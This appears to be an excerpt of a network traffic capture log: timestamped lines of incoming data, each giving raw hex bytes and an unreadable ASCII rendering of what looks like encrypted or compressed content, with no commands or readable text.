2022-11-03 06:22:07 UTC	86	IN	Data Raw: e1 d8 02 fb fc 67 21 f2 ce 8b 2d f2 39 d7 7c 19 02 6b 79 1b 93 ab 0b 36 b8 7a 82 71 5f cb 26 78 1d cf fa d5 5d 34 db 9d 72 e0 d0 96 29 ac 8d 84 fb 4c 2b 8b 4b b7 cf bf 19 b7 12 58 f0 cf c7 d9 0e 4d 3b 2a c1 01 4e 30 68 0a 81 cd 12 21 2b 33 fb cc 7b 2a b6 4f 0d 96 30 a5 04 b9 b7 25 21 26 8b ab 9b b6 b4 1e 47 91 75 da 2a 99 9c f1 ed a1 f7 08 f6 69 ed a1 7b 27 9a 9b 29 7c de 90 de c7 44 35 40 17 9a a8 9e 4a 65 27 32 46 bd b2 c0 62 83 a3 60 cf 49 7a e1 01 d0 9c c3 20 31 f7 81 53 73 f8 90 0e 14 8f f9 d1 f7 a0 ca 41 07 23 90 82 e5 4c e2 e6 10 32 c7 9d 79 a1 1f 95 d8 38 fd ff 5d c3 18 08 3d 47 1b e6 04 ae 53 b1 5f 0b 3f 84 57 81 c7 ab 38 cd 40 2a cc f9 8f c5 cc d4 15 9f c5 47 79 83 24 9e 26 9c 3b ad 67 9b 26 23 f4 b0 a9 4d 34 3a 19 7b 49 46 56 29 93 59 17 34 21 Data Ascii: g!-9\|ky6zq_&x]4r)L+KXM;N0h!+3{O0%!&Gui{')\|D5@Je'2Fb`Iz 1SsA#L2y8]=GS_?W8@Gy$&;g&#M4:{IFV)Y4!
2022-11-03 06:22:07 UTC	88	IN	Data Raw: 2d b4 d5 15 a8 5d 73 54 d1 e7 7b 88 8f 49 84 af 44 f2 bb f4 22 71 ae 42 d1 d4 8a a8 b2 4c 53 81 a4 2c da ae 35 fa 4f fd 47 78 86 ee 1b 50 b5 95 b9 e4 63 90 7c 33 c8 e6 9c 2a e8 99 05 30 2f fb af c1 c0 3b c4 96 69 35 3c 68 19 87 a2 ce 52 fa 3f 13 ce 71 0a cc 11 dc a2 4d 0c 0a a5 d6 61 17 03 45 4d 34 03 ce 03 9e c1 86 d2 5d 57 92 95 04 22 e1 97 f5 09 89 57 d7 26 07 2a f1 e1 9d 6c 67 ed a9 03 3f 71 dc 26 38 85 99 19 8b b8 fb 4a d1 60 0b 16 a4 f2 f2 5c 3a ea 67 ea d5 67 14 f9 94 f0 53 c7 f4 e9 54 4a b4 04 62 56 a6 2a 6f b9 93 a4 83 be a8 da 0d ff 85 df 4e 29 5d f9 f4 20 d0 c9 54 6c 22 7e 94 a3 32 31 cb 60 86 ee da 5c 49 de b1 84 10 50 4a 29 96 3f cf 8b 5c 2c d2 b6 91 b1 5e 6c 38 92 b7 24 88 e8 4f 9a 0d b3 7a 93 76 7a 93 8a c1 cb e3 d7 1a 8a 15 c7 d0 35 8e ee Data Ascii: -]sT{ID"qBLS,5OGxPc\|30/;i5<hR?qMaEM4]W"W&lg?q&8J`\:ggSTJbV*oN)] Tl"~21`\IPJ)?\,^l8$Ozvz5
2022-11-03 06:22:07 UTC	89	IN	Data Raw: 72 56 c0 a3 15 09 c9 9a d3 3f 4d 0a 42 f9 d8 07 15 5a 32 ae b0 fa df cd f9 ec f9 2f f3 e7 46 48 9c 9f 95 2d 83 70 b3 6a 75 3d 6e 42 03 a1 ac 30 69 a3 56 b9 57 73 ed 19 5d 5c e7 f6 bb 0c 2a db ec 3b b1 e3 9d 09 94 bb 83 ca 4c 55 96 5f cf ea ba 31 bb 19 2d be f1 8b e3 22 16 52 66 db 79 6e 68 51 35 b2 c1 43 03 3b 2d f8 b4 6d 25 ee 1f 72 8b 2c e7 34 ed b5 6f 75 71 d0 d1 a7 b1 a1 7f 7a f0 04 c1 24 e7 e2 ee a0 e5 b8 72 fb 59 d0 9a 4b 22 9f d2 27 3a a5 c2 d8 f4 25 24 66 0a ab d4 87 6c 47 3c 5c 37 e9 e7 84 77 9f 9e 41 ee 61 70 83 43 91 d4 dc 12 36 e9 d0 0f 68 aa 94 18 3e 8f e7 d9 df fe d5 4e 27 11 e3 b0 e0 44 9c 90 07 7e ec ed 1f ad 6c c4 9e 48 b0 b9 5e 88 36 23 0d 62 3d cd 18 b6 77 bc 4d 79 4d b0 23 fe 8f e4 35 ff 34 5a ad 9f f4 fb ca c2 61 9a e9 37 3e db 7e c2 Data Ascii: rV?MBZ2/FH-pju=nB0iVWs]\*;LU_1-"RfynhQ5C;-m%r,4ouqz$rYK"':%$flG<\7wAapC6h>N'D~lH^6#b=wMyM#54Za7>~
2022-11-03 06:22:07 UTC	90	IN	Data Raw: ac 82 1f c9 f8 24 85 3e 1a bb 04 44 b8 5f a1 ff d1 57 c7 24 a5 6b 80 e7 8b 46 fb 8c 00 ec 10 11 10 c0 8f 32 d1 96 3c a1 ba 22 df eb a7 42 0f d5 7f a4 e7 fd ad 8a 0a 25 a5 81 55 95 fd 47 a8 5b d4 26 2f d9 cf 0a 56 b1 fc ae fc 0e 86 54 3c bb 82 e6 42 ed bf 0a 60 77 ca cf ba c0 17 fc b0 4f 6f 60 53 74 bd 9a ae 2b 84 63 17 f0 08 16 f7 37 e9 96 3e 48 39 f4 d8 5f 30 21 5e 2e 08 4e cb 50 cc 9b ce 95 1f 49 d7 b2 21 2f cd 94 8a 1a c3 2e ba 5a 09 01 a6 cb 85 6b 28 e9 d9 39 2b 44 b6 43 69 88 91 07 9a b8 dc 50 8b 75 02 40 e3 e3 eb 64 4f 93 7c a7 fc 5c 35 e3 88 b3 71 fb f4 e2 4f 5c c6 23 65 7a b4 0a 7f 91 8e aa 9f a2 b4 e0 6f 8e b6 8f 32 04 72 ec f6 0b c1 c6 46 75 55 02 e4 a5 6b 06 87 08 bc f6 c5 69 6d 8d 8d 96 5e 4a 60 6b 86 25 cf d4 56 17 dc ca e0 a4 04 20 64 eb e7 Data Ascii: $>D_W$kF2<"B%UG[&/VT<B`wOo`St+c7>H9_0!^.NPI!/.Zk(9+DCiPu@dO\|\5qO\#ezo2rFuUkim^J`k%V d
2022-11-03 06:22:07 UTC	91	IN	Data Raw: c9 1a 66 f8 93 72 2f b6 8c b2 be 0c 03 76 6f 58 e1 81 f3 b1 b8 f3 63 d9 a6 17 19 c5 93 36 3e d0 d3 a7 4a 39 23 43 a6 b1 49 74 0e 2b 81 e0 f3 f2 aa e4 da ff 0c cb c3 4b 57 fa bb 91 56 ed 3a c6 74 01 6a 60 35 56 d6 85 39 42 e2 42 f0 6e 79 de 75 47 1e cb f6 d8 08 2e a1 96 62 ef d4 af 7d f9 d8 ce 93 72 7a a0 6e b8 9a 80 31 84 00 2c aa d3 96 d3 28 53 29 34 b5 2e 28 52 14 72 c7 8f 0b 3e 3d 20 b4 d7 60 78 ee 34 08 a1 33 e4 12 bb b9 38 20 26 bd df a7 80 de 07 33 e3 71 f9 1a 93 cd ed 9b df 8d 51 a7 74 e7 8c 51 3b b1 89 4a 69 e9 b8 e4 cd 4f 57 0e 7d de 96 92 6a 12 61 67 3f 99 de af 52 8a b3 74 c3 75 26 f8 3a c3 88 f5 32 3d 85 b7 18 06 ba 97 0d 34 9f ff e3 d7 85 d1 54 3c 51 d3 83 fd 26 c0 e1 1d 7a f0 a3 75 d8 2f 8b e5 6a b1 fb 4c fd 30 45 05 47 57 fc 65 b5 78 cd 5b Data Ascii: fr/voXc6>J9#CIt+KWV:tj`5V9BBnyuG.b}rzn1,(S)4.(Rr>= `x438 &3qQtQ;JiOW}jag?Rtu&:2=4T<Q&zu/jL0EGWex[
2022-11-03 06:22:07 UTC	92	IN	Data Raw: 45 e9 21 02 8f bc 80 90 5f 53 45 b7 eb 48 7a df 9c fd a8 95 00 ea 6a 6a 94 c0 ee 53 8e 99 30 f7 7e 63 a5 22 45 bc 51 a8 fd fc 7c c6 24 bc 1b 92 f9 a8 7f c8 bb 03 f4 19 44 54 93 e3 31 d3 9b 37 b5 9e 3f c4 e2 8a 37 7f 9c 18 a8 d2 86 e1 80 3c 4a 99 a2 5e d8 ac 22 e3 68 c6 5f 04 87 e1 58 40 f0 9b e9 b8 56 fd 10 25 c6 ee f1 44 97 8e 20 3e 18 98 a7 f5 db 2d c1 80 4f 18 4b 44 72 af f4 c4 1c ed 7a 55 e4 47 2b d1 1a ee e4 57 2a 1d a4 a7 71 72 33 6f 1e 0f 66 d3 21 e2 fc 98 ef 0f 18 d5 cc 26 50 f8 9d f3 17 b5 78 cd 0e 06 3a a3 f7 ad 55 3a ee 9b 10 1c 3c b2 67 3f c1 a9 69 8f a2 bd 6f 8b 52 69 31 a5 83 e1 78 7e ce 20 9b 95 45 32 c9 8c d0 71 d5 ff 8f 69 4e f7 22 04 43 ab 12 43 81 bc 96 96 b8 a5 e6 03 ba cf 85 0d 32 44 cb 90 53 ee f4 05 26 33 49 9d a6 76 40 82 35 8e d0 Data Ascii: E!_SEHzjjS0~c"EQ\|$DT17?7<J^"h_X@V%D >-OKDrzUG+W*qr3of!&Px:U:<g?ioRi1x~ E2qiN"CC2DS&3Iv@5
2022-11-03 06:22:07 UTC	94	IN	Data Raw: e4 5e 74 79 5d cc db fc cd cc 0f 54 43 1c 8e dd db dc ef 61 9b 53 76 58 7a 80 46 7e 81 bf 4b 13 90 8b da d2 7f 3b 03 39 4c 9f 97 f2 c5 82 8c 40 e9 a3 03 13 db 9e 0b 1f b2 cc eb 4d 16 4b 5b a6 8c 6a 6a 42 1c de f3 d0 ba cc c0 c7 d8 2a 97 ff 30 66 f9 8f fa 56 e2 19 e9 56 72 36 34 6c 17 80 b2 34 75 b7 48 ba 31 4f ca 7a 5a 4a d2 f4 a1 60 17 c5 d1 69 ee b6 ac 06 8f 8e bf cb 72 43 a9 40 c4 e0 c6 6b ed 15 51 93 fd 9b cd 26 1a 3a 2c 89 0e 5d 65 61 0e a1 e3 50 1e 31 0f f4 d1 17 74 8b 6c 13 da 10 a2 0c 82 b6 3d 3d 18 8b 96 af c4 8e 55 43 9a 7d de 24 c1 f5 f2 99 e4 95 5f a2 4b e0 fa 74 30 bf a3 5e 1e b5 c8 c0 da 3e 04 37 0b de e7 c5 04 5b 28 56 31 f4 fb 88 4b 8f a5 68 f5 46 39 8a 72 c5 8c 99 12 6b dc ff 0a 6c 85 ef 11 02 8b fc d2 f4 98 df 7b 30 06 ff 94 d4 0b e9 dd Data Ascii: ^ty]TCaSvXzF~K;9L@MK[jjB*0fVVr64l4uH1OzZJ`irC@kQ&:,]eaP1tl==UC}$_Kt0^>7[(V1KhF9rkl{0
2022-11-03 06:22:07 UTC	95	IN	Data Raw: d4 fe ee 47 8a c4 ac 6c 37 fd 40 e2 4c 5f 5f 75 f8 37 c6 c6 f2 48 06 91 03 33 c5 2f 5a c6 d6 99 b1 52 7d 42 9b 85 44 66 ea c0 ec e6 e0 16 86 26 3f ad a8 80 53 a0 c8 6c f0 0d 64 be 14 56 bd 41 dc ad dd 45 c4 0c f7 59 81 f4 80 57 cd bb 57 d1 64 7e 73 b6 dc 0e df a7 14 86 bd 4b b6 ad fd 03 14 d4 7c fa f9 e6 d6 82 59 39 94 ba 59 ce b7 20 de 41 fe 7b 27 aa d3 58 63 a2 a3 e1 b4 2c b0 5c 1a 81 96 e6 31 b1 af 37 0c 07 9b d1 87 92 75 ea c6 47 3d 41 08 29 b4 a5 a9 55 bc 1f 55 90 57 5c df 36 f8 88 73 23 73 b0 a1 46 1d 3b 2c 2e 3a 5c c3 1a e5 82 dd a3 6f 62 95 bf 41 55 b5 f5 fa 2a 97 54 ff 0a 6d 31 a6 cb 9b 46 75 d3 93 45 35 78 cd 11 29 b1 9f 0f a8 9a c7 52 83 74 4f 0a b4 8d b1 56 42 b5 05 b5 c1 6f 1a ec 9d aa 1c ae 88 cb 28 6a b0 01 66 46 d6 39 5e 9d b3 b7 b0 a0 ab Data Ascii: Gl7@L__u7H3/ZR}BDf&?SldVAEYWWd~sK\|Y9Y A{'Xc,\17uG=A)UUW\6s#sF;,.:\obAU*Tm1FuE5x)RtOVBo(jfF9^
2022-11-03 06:22:07 UTC	96	IN	Data Raw: 0b 6a 56 d3 b3 9a fe 2b b1 6f 7d a5 85 5d 06 91 e2 18 4d 47 02 fd 43 97 9e cd 1a 07 1a 1d 9c ff ee fd 82 3d 7c 00 3c c4 86 8e cd bb 7b b9 2e 64 7b 3b e6 6f 7d e4 e4 10 45 dc d7 92 c9 7e 77 19 01 4d ec 96 af cf 86 ad 66 f4 84 03 0c d3 a2 2b 0d ad 95 87 48 27 16 78 ce fa 07 61 6b 00 9a ee df d8 d3 ec d9 ba 2b 9c ae 23 21 be a7 e7 22 e4 3a c4 74 2d 1a 1b 7e 44 9c 95 69 23 e2 29 ed 6b 4b d1 71 28 2e 9b fa 99 1e 44 ae dc 5c f8 fc 81 0b ab bf 84 da 57 69 a8 7e a2 e0 c8 69 92 24 2b ae c8 c9 e3 35 5e 29 42 c9 72 77 6e 11 2c a1 f9 6f 18 2e 6a 81 a5 1f 66 86 21 00 b5 33 ad 2e a6 9c 1b 22 10 99 bb 97 82 84 5c 05 97 26 ea 28 e6 8b e7 b9 d7 a4 12 9d 72 fc 97 5e 16 ce 9c 53 0a d2 b6 91 b1 72 49 33 2f b0 ab 8a 00 5f 24 6d 4d eb f8 b9 24 af 93 58 ef 63 22 c6 7b dd ba db Data Ascii: jV+o}]MGC=\|<{.d{;o}E~wMf+H'xak+#!":t-~Di#)kKq(.D\Wi~i$+5^)Brwn,o.jf!3."\&(r^SrI3/_$mM$Xc"{
2022-11-03 06:22:07 UTC	97	IN	Data Raw: fa 3b 34 32 51 de 87 98 7c 71 88 2d 9c 63 34 95 83 c8 4e f6 b6 f6 88 f1 23 c7 b9 e2 26 d0 bb b7 4f 02 d6 47 a4 4c 69 57 41 ee 0c e8 e3 92 40 34 81 0e 53 df 0f 0a c2 d3 f2 e3 00 4e 63 b4 b8 41 42 d8 f3 c0 83 a2 73 e3 31 08 a5 99 a3 4f b8 ad 75 e9 72 1f ed 73 0a a2 7c 87 a2 e6 65 ff 19 88 43 aa c3 8e 4c df a5 02 ec 44 78 20 Data Ascii: ;42Q\|q-c4N#&OGLiWA@4SNcABs1Ours\|eCLDx
2022-11-03 06:22:07 UTC	97	IN	Data Raw: b6 f3 7e 84 c4 5b d1 89 04 e5 c5 86 1b 10 ee 7d fa 95 93 fe e7 23 59 9b aa 0e ef ce 1e f2 17 ac 1e 6d dc d7 57 30 a2 90 a5 ff 11 ec 7c 1b 99 af ec 70 92 dd 1b 6a 2f b2 bc d6 8c 75 9b d0 22 26 39 7f 76 80 91 a0 7b a4 12 51 da 57 31 8d 23 ec e3 65 2f 74 95 dd 19 0d 3a 28 34 17 64 f0 0a c6 92 9d 97 08 48 c2 a2 17 3f 87 b5 fa 5b dd 2e cb 37 6e 26 9c cd ac 69 65 e8 af 36 34 66 ee 12 71 c5 ec 31 bb 9a ed 4a b0 4f 7b 2e 96 92 a2 31 5f de 1b 9e ce 45 31 d0 93 c1 69 d4 88 ba 3b 30 f3 04 45 6d d2 1f 62 c6 9d b4 aa dd d0 fe 4d cc bb ea 1e 2f 67 de cc 05 ed df 61 18 33 11 bd a2 3f 79 b1 39 9d f0 f2 00 6c eb a6 91 5b 06 2d 61 a5 18 8c b8 17 19 b0 96 b3 fe 4b 64 55 c5 d1 75 8f fd 45 9a 43 c1 63 e6 1f 14 e2 ef f3 d4 9f dc 54 96 12 fe dc 26 a3 c6 5c fc 30 7f 29 63 4f 62 Data Ascii: ~[}#YmW0\|pj/u"&9v{QW1#e/t:(4dH?[.7n&ie64fq1JO{.1_E1i;0EmbM/ga3?y9l[-aKdUuECcT&\0)cOb
2022-11-03 06:22:07 UTC	99	IN	Data Raw: ab 6c 22 23 10 e3 d6 78 21 59 2b bf f4 b0 ff f9 ce d8 b3 79 a1 8d 3d 6d f6 8a c5 79 b2 3a d6 61 0c 66 17 74 1f d9 a6 35 54 f5 40 e1 68 6a 9b 71 15 0d 85 b6 bb 31 20 a0 db 71 d4 d5 8c 08 fd b1 a3 f6 4b 7d 97 39 c8 cb 88 3f b2 37 2d 87 c3 9b c5 56 19 2e 50 8e 1e 6b 4b 61 10 f3 9d 70 7b 64 57 a2 bb 53 73 c3 1c 56 be 2d 84 1d 8c 9a 1c 21 55 8b 9b 84 c2 d1 53 03 8c 3b b5 6d ab 8c 9d a1 da b9 4e aa 57 f5 be 7e 39 8d 8a 78 79 e4 98 c1 a8 42 23 45 35 94 da db 39 09 6d 7e 30 d2 e8 be 4c f9 a8 34 c5 60 01 fd 13 c4 ad ce 39 72 8a ce 0e 7a f6 e0 7f 6d fb fd e1 eb fd f8 15 59 39 f2 b1 d4 2e fe f5 53 1c ee a0 17 aa 43 fc 99 76 f7 f6 55 86 01 05 66 4e 22 c0 79 a4 5f c6 7a 17 19 f5 49 b0 c3 c0 4f 97 0c 66 93 89 d7 dc 95 ea 64 9f f7 4c 1d 82 78 df 23 fe 46 ab 7c 94 0a 44 Data Ascii: l"#x!Y+y=my:aft5T@hjq1 qK}9?7-V.PkKap{dWSsV-!US;mNW~9xyB#E59m~0L4`9rzmY9.SCvUfN"y_zIOfdLx#F\|D
2022-11-03 06:22:07 UTC	100	IN	Data Raw: 06 a0 06 40 eb 3f bc 9c 85 0d b2 1f a3 41 b2 d9 de 4a e2 99 35 e9 5b 43 57 a1 87 76 dd ae 17 dc 93 17 e9 b6 f4 46 3b c8 56 c3 ca f5 fb 87 30 28 82 f2 30 9e b5 25 f6 4f de 29 0f ab e3 13 69 9e 98 bc b2 38 b8 46 32 84 af c9 6b a4 e8 4e 60 3b 98 ad c4 d2 23 ca c3 7a 3d 72 52 0a b4 ae 9c 44 96 18 67 f2 75 3b c4 09 d8 bb 34 2f 4c e0 b4 48 2a 03 48 4a 07 7a d9 58 90 97 f5 9a 5f 68 fd b8 49 24 e7 93 a1 11 a4 42 ec 1a 60 37 9d c6 a5 63 51 9a d7 04 30 77 c8 2d 2c b9 ef 7b 94 9e e7 59 b5 75 7e 09 ab b4 8c 23 7d ce 2b b9 96 59 36 d7 82 db 5e e4 f3 ce 6a 58 d0 4d 74 52 8a 2b 57 b7 ae a8 8f de af dc 59 c0 a2 c2 08 29 53 ec d5 0f ed a5 7e 6c 55 02 e4 a5 37 7d 92 79 98 88 b2 58 50 e5 9b 95 56 77 5b 2b 92 40 cd 92 48 27 87 9c d8 ed 53 1b 77 e1 e4 57 9a be 62 e1 7e b5 6d Data Ascii: @?AJ5[CWvF;V0(0%O)i8F2kN`;#z=rRDgu;4/LH*HJzX_hI$B`7cQ0w-,{Yu~#}+Y6^jXMtR+WY)S~lU7}yXPVw[+@H'SwWb~m
2022-11-03 06:22:07 UTC	101	IN	Data Raw: 9d 87 ee 73 73 03 23 68 d2 ee f3 d6 f1 f7 40 d7 93 7e 50 df 82 33 1e c2 a7 f0 21 01 30 00 ec cb 2c 35 52 2f 9f f6 ed ca d4 c5 b9 e1 05 d8 e2 46 66 87 82 c0 62 ba 21 db 28 08 19 17 58 20 b4 81 2e 30 8b 7e a4 21 44 d0 00 6f 78 8c 8f 92 30 5e b7 d8 2d d5 e1 b4 17 9b a9 dc f8 60 19 c7 34 8c f9 a3 33 87 3b 7b 8a fd a6 c8 0a 69 21 2d c1 1d 79 72 1c 76 93 88 04 35 6a 24 cf d5 41 4e de 55 45 9f 0e b1 09 a5 ba 3c 0c 2e b2 d1 d6 d4 de 4b 00 b1 15 c9 1a ec d9 c5 9c c3 94 53 be 60 81 97 01 1c cc b9 7b 4d bb c2 a9 af 4f 1b 57 36 88 b8 a9 52 70 3b 4d 2c d2 fd 9c 2b f9 bc 34 e2 65 3c d1 34 8f d4 ad 50 3d c9 8e 7f 69 f2 90 3d 24 f2 f6 8e f5 9f dd 73 3d 47 f7 d5 bf 3c d0 fa 50 05 f5 81 70 a4 62 ef 8f 53 8b be 38 ef 2a 47 1b 47 18 c1 65 e9 36 d7 21 35 16 db 77 b7 ae 84 0b Data Ascii: ss#h@~P3!0,5R/Ffb!(X .0~!Dox0^-`43;{i!-yrv5j$ANUE<.KS`{MOW6Rp;M,+4e<4P=i=$s=G<PpbS8*GGe6!5w
2022-11-03 06:22:07 UTC	102	IN	Data Raw: 44 53 7e ab f7 7f 65 e1 fd ed 96 a4 7f d6 1c 23 fb b2 ee 1f f4 db 3a c9 2d 64 83 3d 61 b5 6e 87 ad c9 78 e5 0d aa 4c 94 dd 8b 45 e6 ae 13 a6 10 2c 33 de c3 73 c9 a2 2f d9 ac 45 c3 c1 f1 3b 74 d0 42 cd f0 e7 d3 e5 58 3f 87 fd 55 a8 de 59 e4 7d d7 4b 21 b5 96 0d 34 a4 a6 9b bd 2f b0 09 3c bc 82 c9 45 e3 b9 50 60 4a e9 d1 f6 fa 6c ac c3 2d 39 63 44 10 da bb a8 2c a2 0d 68 f3 65 5c c7 23 cd ea 3e 75 1a ea 94 63 0f 3f 77 3e 11 68 ac 1e d7 a7 91 d6 14 1c d5 b9 3c 5e e1 83 b0 66 c3 13 e8 1c 47 04 b4 f6 bc 3c 02 d1 9f 01 39 6e f8 09 1c b8 b1 2c ad b4 e2 5b b6 56 50 09 86 a3 a2 7c 68 84 44 85 c1 43 03 cf b6 f2 4c ff da ce 7d 6e f6 00 5f 7a e2 2f 69 9f b4 8d b2 8d 8f f9 3e f3 82 d1 08 09 55 d0 ca 19 c7 9c 76 27 3b 4f bc b7 7b 75 87 33 92 ba c0 4b 41 d5 97 87 36 6f Data Ascii: DS~e#:-d=anxLE,3s/E;tBX?UY}K!4/<EP`Jl-9cD,he\#>uc?w>h<^fG<9n,[VP\|hDCL}n_z/i>Uv';O{u3KA6o
2022-11-03 06:22:07 UTC	104	IN	Data Raw: ad c5 2f 77 2d 41 e5 8e eb be 9e 5f bc 4f 5b 4e 6f e1 79 5c cd b0 77 01 9e 80 d0 ee 7f 5b 01 3e 43 d6 94 aa b4 ae a9 7b d9 dc 0b 50 e7 f1 45 6e d7 9a a2 7f 43 0f 5f d3 e9 16 60 45 7e 8c c5 c1 ac e7 bc e2 fc 2c 96 9c 51 21 f2 ce 8b 2d f2 3c fd 2c 39 2d 1c 56 17 de 9e 0e 23 a8 61 b7 35 4c cd 7f 5a 79 e9 fa d5 5d 34 db 9d 20 d8 a3 b6 25 8a 8d d5 e8 6f 69 d5 5e 9c e3 83 1e 9e 18 48 8c eb c2 9c 63 08 52 17 97 7c 68 44 18 78 91 9a 67 07 3a 2f f2 d3 16 45 86 14 5d be 3e 85 63 f4 d2 71 75 00 bc 9f a3 c4 96 09 5e 8c 05 e9 68 c2 c4 e3 93 e9 b4 44 84 6e e8 bf 0e 4c f8 cc 27 4b c2 b5 99 da 26 3c 5e 09 85 a6 b1 60 4d 38 44 23 e2 d5 99 7d ba a0 3f 9a 30 6e 83 32 fd 8e ce 19 6d cf d2 6d 43 ae a8 09 03 93 b8 d4 f1 ad d6 6c 05 12 9b dc 87 5a 9c e1 74 76 df e3 7d 86 1b cf Data Ascii: /w-A_O[Noy\w[>C{PEnC_`E~,Q!-<,9-V#a5LZy]4 %oi^HcR\|hDxg:/E]>cqu^hDnL'K&<^`M8D#}?0n2mmClZtv}
2022-11-03 06:22:07 UTC	105	IN	Data Raw: 16 8d 4e d0 50 7e 7b 26 8b 20 be a8 88 3f 2f 87 5d 50 c8 32 5e b9 81 a8 f8 68 73 40 e4 bd 04 61 e0 8a ff 9e b1 08 86 57 74 a9 92 b0 41 8c cc 63 e7 37 6c a0 00 45 89 4e a3 ba e8 57 d6 0c f1 49 ac fb 8d 75 d6 ae 05 ae 75 69 69 ac fb 3b e1 a3 5c b4 b4 02 f4 f9 fd 72 61 a1 4a fc ea c3 a4 cb 21 0d a5 99 06 91 96 17 d7 1e fd 71 0d bb cb 34 53 fc f7 d4 a6 6b af 75 1f 80 9d d6 61 81 a7 54 2c 22 fa 82 eb fa 79 f2 ab 7d 35 5b 76 76 97 f1 bd 76 a0 77 49 c5 58 08 f4 06 c2 98 6c 14 4b 93 9c 6b 7f 54 3c 41 13 73 de 50 f6 8a f1 be 65 62 e9 de 2e 5f ed bd b1 2e ab 77 c9 0a 75 4d e8 84 eb 01 20 f6 da 17 30 56 d6 16 55 a6 b6 3e 8e e1 db 5a 89 15 70 29 95 95 a3 7c 57 d9 72 86 9d 6a 28 97 ac ed 2a d8 e7 d7 29 54 f0 58 58 59 df 7a 24 cb ab b5 9f 81 bc d3 76 ed 83 f2 48 52 4d Data Ascii: NP~{& ?/]P2^hs@aWtAc7lENWIuuii;\raJ!q4SkuaT,"y}5[vvvwIXlKkT<AsPeb._.wuM 0VU>Zp)\|Wrj(*)TXXYz$vHRM
2022-11-03 06:22:07 UTC	106	IN	Data Raw: ab 2e 08 b4 ce 44 25 9a d8 17 32 47 25 fa 4e d4 b3 98 59 54 29 6b 97 c9 ee e3 b0 66 5b 19 58 b6 c3 e6 8e bf 4f ad 73 4a 76 28 e0 69 22 f6 bf 55 08 88 a7 8d e2 5b 35 3d 37 71 c1 bb f9 b0 f1 92 7a d8 b8 3e 57 c2 e5 0a 24 b3 e1 83 71 31 46 34 b8 b1 38 3f 64 34 d8 b0 c9 c1 fd cd f1 c6 22 d3 e7 72 72 bb a1 9b 41 c2 12 b3 26 40 74 60 44 3a bc 87 65 4a 93 43 91 52 68 cc 22 74 67 dc 9e 8f 1c 5e d7 80 7f b1 af d8 63 f9 a9 99 e7 6f 2a a9 61 97 f5 b8 2f bb 35 52 b2 ee a9 e7 0a 12 07 20 9f 79 22 03 0a 72 b6 9e 7c 0c 1f 27 d9 ca 53 50 dd 1d 56 d6 51 86 31 b1 ea 28 3a 30 94 d1 eb f7 c0 07 42 8b 3e e9 15 e5 f5 f6 a3 ff bc 66 bf 50 83 8f 7e 38 b2 85 60 4b c7 c2 94 8c 51 57 7f 18 8e d0 95 01 5b 61 3a 4a f0 c1 8d 5f 86 b5 6a dd 7c 24 c4 13 c5 d4 90 73 23 85 c6 55 50 f2 a5 Data Ascii: .D%2G%NYT)kf[XOsJv(i"U[5=7qz>W$q1F48?d4"rrA&@t`D:eJCRh"tg^co*a/5R y"r\|'SPVQ1(:0B>fP~8`KQW[a:J_j\|$s#UP
2022-11-03 06:22:07 UTC	107	IN	Data Raw: 6b 5d 98 31 88 1e 71 a9 e8 d4 54 c2 9f a5 df a1 58 9d f5 90 6d a0 eb 9f 4d 61 82 51 a7 12 1e 69 4f de 04 c6 fc c7 6c 38 85 0b 5c 87 68 50 8e 8f 94 ba 6c 5c 79 91 84 01 6d fa eb ec af a9 05 f2 34 13 a6 b3 92 1f c9 f8 24 85 3e 57 88 32 5d e2 6c a9 89 e8 5c fa 14 87 64 88 d7 d0 74 a3 a1 03 fc 10 11 10 c0 8f 32 f1 ae 5c bc b7 19 92 b8 b0 19 2a cb 73 c3 e0 82 f6 f7 3c 31 c2 a7 55 95 fd 47 a8 5b ce 6b 36 d8 ee 56 51 a9 fd b5 b7 17 e7 15 36 c3 8a de 31 b8 dc 1a 60 77 ca cf ba c0 2c f2 86 57 39 6f 67 75 99 ac 93 49 bd 20 62 fb 0a 1b 8a 01 ce 86 3e 48 39 f4 d8 5f 09 24 68 38 36 46 f3 2a f5 b4 d5 9d 5d 43 c8 90 40 4c 82 87 9d 2c c3 2e ba 5a 09 01 ba d0 86 50 3a 9d bd 1b 3a 77 ab 05 6d ac 8a 26 a6 e2 e3 74 8f 43 02 40 e3 e3 eb 64 61 80 37 e5 c8 69 2e f0 96 c0 57 f8 Data Ascii: k]1qTXmMaQiOl8\hPl\ym4$>W2]l\dt2\s<1UG[k6VQ61`w,W9oguI b>H9_$h86F]C@L,.ZP::wm&tC@da7i.W
2022-11-03 06:22:07 UTC	108	IN	Data Raw: 59 7f 44 85 93 a3 2e 93 fc 33 b0 35 6d e0 80 62 e0 20 7c 28 d0 81 98 84 3c d8 26 4f fc ca 7b 3e 9d e2 2b 63 05 37 e8 49 91 ca e0 36 79 7b 4a e9 eb d5 d6 80 29 2d 47 65 95 dd aa db b4 57 af 6a 59 45 74 ce 65 5f d0 80 09 16 b7 db d3 f3 01 73 2c 02 7d f2 fc 99 b6 f6 91 65 f1 99 75 23 d1 8d 3e 3f 91 f6 e1 45 4d 7b 17 a6 fd 3a 0e 0b 34 a2 d3 e1 af f6 c7 dd bc 23 85 dd 56 73 83 b7 90 65 ba 39 fc 57 07 07 64 71 38 aa a0 2c 66 97 7b 92 7d 2e d1 26 5b 7b 85 c7 cb 60 66 d7 a0 7c a8 eb bb 11 b4 a1 dd df 32 48 92 50 af eb 9b 6d be 43 76 b3 dd 86 d2 28 7d 3d 54 8c 0e 66 4d 6f 25 a6 c7 60 3b 3b 0e d8 bb 22 34 8b 1d 49 d0 32 b5 0a b1 e4 3f 1c 43 a3 85 ae c6 a0 6a 05 85 18 b9 18 dc 92 9d d0 bf ca 5a 92 68 f3 fa 4b 43 a9 bb 54 7b d4 b1 e3 ef 1c 32 76 19 d3 a8 8c 68 17 6d Data Ascii: YD.35mb \|(<&O{>+c7I6y{J)-GeWjYEte_s,}eu#>?EM{:4#Vse9Wdq8,f{}.&[{`f\|2HPmCv(}=TfMo%`;;"4I2?CjZhKCT{2vhm
